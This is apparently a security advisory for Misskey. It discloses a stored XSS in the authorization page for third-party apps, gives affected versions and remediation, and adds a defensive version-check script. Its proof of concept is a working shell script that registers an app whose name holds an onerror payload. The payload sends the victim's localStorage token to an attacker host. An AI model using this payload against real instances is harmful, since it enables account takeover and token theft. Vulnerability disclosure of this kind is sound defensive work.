Advisory Author: Acid Chicken (硫酸鶏) [email protected]
Summary
A vulnerability in the authorization page for third-party applications could allow a remote attacker to hijack a user's token.
Affected Versions
>= 10.46.0 < 10.102.4 || >= 11.0.0-alpha.1 < 11.20.2
Proof of Concept
Token hijacking URL generator (shell script)
Requires bash, curl, and jq.
DO NOT USE THIS COMMAND IN A PRODUCTION ENVIRONMENT
sufferer='localhost:3000'
attacker='localhost:8080'
# App name carrying the payload: the authorization page renders it as HTML, so the
# onerror handler fires and sends the victim's token (localStorage key "i") to the attacker.
name="<audio><source onerror=\"location.replace('https://$attacker/?i='+localStorage.getItem('i'))\">"
# Register the malicious app and keep its secret (jq builds correctly escaped JSON).
secret=$(curl -LSs "https://$sufferer/api/app/create" \
  -d "$(jq -cn --arg name "$name" '{name: $name, description: "", permission: []}')" \
  | jq -r .secret)
# Start an authorization session for that app; the returned URL is what the victim must open.
curl -LSs "https://$sufferer/api/auth/session/generate" \
  -d "$(jq -cn --arg secret "$secret" '{appSecret: $secret}')" | jq -r .url
Details
The application name submitted to api/app/create is rendered as HTML on the authorization page without escaping (a stored XSS). An attacker registers an application whose name carries a script, calls api/auth/session/generate with the application's secret to obtain an authorization URL, and must then get the target user to visit that URL. When a logged-in user opens it, the script runs in the origin of the instance, reads the user's token from localStorage (key "i") and sends it to a server controlled by the attacker.
Workaround
For users: do not open suspicious URLs, in particular authorization links you did not request yourself. If you cannot decide whether a URL is suspicious, do not open it. For server owners, see Remediation below.
Remediation
Upgrade Misskey to version 10.102.4 or later if you are running v10; otherwise upgrade Misskey to version 11.20.2 or later.
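Server owners can check whether a running version falls inside the affected ranges with the script below. It is an added example, not part of this advisory or of Misskey's code. Version precedence follows SemVer 2.0 so that the 11.0.0-alpha.1 boundary is handled correctly; the live check assumes that the instance's /api/meta endpoint reports its version in the `version` field, and the host name in the usage comment is a placeholder.

```shell
# Print -1, 0 or 1 as version $1 is lower than, equal to or higher than version $2
# (SemVer 2.0 precedence: numeric core first, then a prerelease tag sorts below the
# plain release, then prerelease identifiers compare numerically or lexically).
vercmp() {
  awk -v a="$1" -v b="$2" '
    # Compare two dot-separated identifier lists; numeric vs numeric compares as numbers,
    # anything else lexically; a shorter list of otherwise equal identifiers sorts first.
    function idcmp(s, t,   x, y, ns, nt, n, i) {
      ns = split(s, x, "."); nt = split(t, y, ".")
      n = ns < nt ? ns : nt
      for (i = 1; i <= n; i++) {
        if (x[i] ~ /^[0-9]+$/ && y[i] ~ /^[0-9]+$/) {
          if (x[i] + 0 != y[i] + 0) return (x[i] + 0 < y[i] + 0) ? -1 : 1
        } else if (x[i] != y[i]) {
          return (x[i] < y[i]) ? -1 : 1
        }
      }
      return (ns == nt) ? 0 : ((ns < nt) ? -1 : 1)
    }
    BEGIN {
      # Split "core-prerelease" at the first hyphen.
      ai = index(a, "-"); ac = ai ? substr(a, 1, ai - 1) : a; ap = ai ? substr(a, ai + 1) : ""
      bi = index(b, "-"); bc = bi ? substr(b, 1, bi - 1) : b; bp = bi ? substr(b, bi + 1) : ""
      c = idcmp(ac, bc)
      if (c != 0) { print c; exit }
      # Same core: a prerelease has lower precedence than the release itself.
      if (ap == "" && bp != "") { print 1; exit }
      if (ap != "" && bp == "") { print -1; exit }
      print idcmp(ap, bp)
    }'
}

# Succeed when $2 <= $1 < $3.
in_range() {
  [ "$(vercmp "$1" "$2")" -ge 0 ] && [ "$(vercmp "$1" "$3")" -lt 0 ]
}

# Succeed when $1 lies in either affected range quoted in the advisory:
#   >= 10.46.0 < 10.102.4 || >= 11.0.0-alpha.1 < 11.20.2
is_affected() {
  in_range "$1" 10.46.0 10.102.4 || in_range "$1" 11.0.0-alpha.1 11.20.2
}

# Live check: Misskey's API is POST-only, and /api/meta reports the running version.
# Usage: check_instance misskey.example   (placeholder host; use your own instance)
check_instance() {
  v=$(curl -LSs "https://$1/api/meta" -d '{}' | jq -r .version)
  case $v in
    *.*.*) ;;
    *) echo "$1: could not read version from /api/meta"; return 1 ;;
  esac
  if is_affected "$v"; then
    echo "$1 runs $v: AFFECTED, upgrade"
  else
    echo "$1 runs $v: not affected"
  fi
}
```

Run `check_instance your.instance` against an instance you operate; the comparison helpers also work offline, e.g. `is_affected 11.20.1 && echo vulnerable`.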